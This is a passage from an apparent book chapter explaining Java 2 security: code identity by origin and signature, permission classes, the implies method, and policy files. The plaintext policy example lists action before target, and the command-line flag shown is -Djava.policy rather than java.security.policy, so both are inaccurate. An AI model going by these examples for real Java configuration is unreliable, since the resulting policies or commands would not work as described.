Identity Every piece of code needs a specific identity that serves as a basis for security decisions. In Java 2, each piece of code has two identity-defining characteristics: origin and signature. These two characteristics are represented in the class java.security.CodeSource, which allows the use of wildcard entries to denote "anywhere" for origin and "unsigned" for signature. Origin boils down to the location the code came from specified as a URL. This is the same sort of identity used in separation of applets in the JDK 1.0.2 class loading scheme. In fact, Java 2 identity is really an extension of that idea. Signature is a bit more complicated. Remember, public/private keys come in pairs. As we know, code can be digitally signed by a person or organization who vouches for it. The key used to actually sign the code
is the signer's private key. The key used to check the signature for validity is the signer's public key. So, the public key corresponding to the private key used to sign a piece of code is the second identity characteristic. (In practice, implementations actually use an alias for the public key corresponding to the private key used to sign the code.) Many people say that a signature on code tells you "who wrote the code" or "where the code came from" (we've been guilty of this faux pas ourselves in days gone by), but this is not true. All a signature tells you is who signed the code. The author, distributor, and signer of the code may all be different parties. All you know for sure is that the signer vouches for the code. And since it makes perfect sense for several people to vouch for the same piece of code, a good signature scheme ought to allow a piece of code to carry several signatures; then each recipient can decide which of the signers (if any) should be trusted.
Permissions Requests to perform a particular operation (most notably a dangerous one) can be encapsulated as a permission. A policy says which permissions are granted to which principals. The abstract class java.security.Permission types and parameterizes a set of access permissions granted to classes. Permissions can be subclassed from this class (and its subclasses). Good practice dictates that a permission class should belong to the package in which it is used. Java 2 defines access methods and parameters for many of the resources controlled by the VM. Permissions include: java.io.FilePermission for file system access java.net.SocketPermission for network access java.lang.PropertyPermission for Java properties java.lang.RuntimePermission for access to runtime system resources java.security.NetPermission for authentication java.awt.AWTPermission for access to graphical resources such as windows Permissions usually include a target and an action. For file access, a target can be a file or a directory specified as file, directory, directory/file, directory/*, or directory/-. The * denotes all files in the specified directory. The - denotes all files under the associated file system subtree (meaning all by itself, - denotes all files in the entire system). Actions for file access include read, write, execute, and delete. An example of a file permission is: p = new FilePermission("/applets/tmp/scratch", "read");
For network access, a target can be an IP address, hostname, or generalized set of hostnames and a range of port numbers. The target argument takes the form "hostname:port-range". Actions for network access include: connect, listen, and accept. An example of a socket permission is: p = new SocketPermission("bigbrother.rstcorp.com:-1023", "connect") For getting and setting properties, a target is the property (where * denotes all properties). Actions are get and set. Runtime system resource targets include createClassLoader, exit, setFactory, thread, multicast, fileDescriptor.read, fileDescriptor.write, and so on. AWT permission targets include topLevelWindow, systemClipboard, and eventQueue. Fully trusted Java applications can add new categories of permissions.
Implies Each Permission class must include the abstract method implies. The idea is straightforward: having permission x automatically implies having permission y. We denote this x.implies(y) == true in code. A permission x implies another permission y if and only if both the target of x implies the target of y and the action of x implies the action of y. Consider the permission "read file /applets/tmp/scratch," which can be written as: p = new FilePermission("/applets/tmp/scratch", "read"); A permission allowing a read on any file in /applets/tmp; that is, a permission denoted by the pair (/applets/tmp/*, read) implies our example permission p, but not vice versa. Similarly, a given socket permission s implies another socket permission t if and only if t covers the same IP address and port numbers for the same set of actions. Alert readers might have noticed something funny about the implies method: Each permission class says which other permissions it implies. This is a bit like Johnny writing himself a note saying he can drive Dad's car. It seems safer to require Dad's signature on the note. Similarly, it would be safer if permission for A to imply B had to be granted by B.
Policy Security policy in Java 2 can be set by a user (which is a bad idea since, as we know, users like dancing pigs) or a system administrator (which in a Catch-22-like situation is also a bad idea since system administrators are severely overworked). The policy is represented by a policy object as instantiated from
the class java.security.Policy. The policy is a mapping from identity (as defined earlier) to a set of access permissions granted to the code. The policy object is a runtime representation of policy usually set up by the VM at startup time (much like the Security Manager). An example policy object (in plaintext form) is shown here: grant CodeBase "https://www.rstcorp.com/users/gem", SignedBy "*" { permission java.io.FilePermission "read,write", "/applets/tmp/*"; permission java.net.SocketPermission "connect", "*.rstcorp.com"; };
This policy states that any applet that arrives from the Web URL "www.rstcorp.com/users/gem", whether signed or unsigned, can read and write any file in the directory /applets/tmp/* as well as make a socket connection to any host in the domain rstcorp.com. Policies are usually made of many grant clauses. In practice, policy is set in a plaintext configuration file and is loaded into the VM at startup. In these policies, a public key (usually a very long string of bits) is signified by an alias. The alias is the name of a signer represented as a string. For example, a popular alias is the string "self", meaning your own private key. Primitive mechanisms are included to create and import public keys and certificates into the Java 2 system. (See Appendix C for the details.) By default, Sun's VM expects to find a system policy in the file <java.home>/lib/security/java.policy (where <java.home> is a configurable Java property). This policy can be extended on a per-user basis. User policy files can be found in a user's home directory in the file .java.policy. The VM loads the system policy at startup and then loads any relevant user's policy. If neither policy can be found, a built-in default is used. The built-in default policy implements the base Java sandbox model. It is possible to specify a particular policy to use when invoking an application. This is carried out by using the Java-property-defining -D flag as follows (for the example, our application is the appletviewer): appletviewer -Djava.policy=/home/users/gem/policy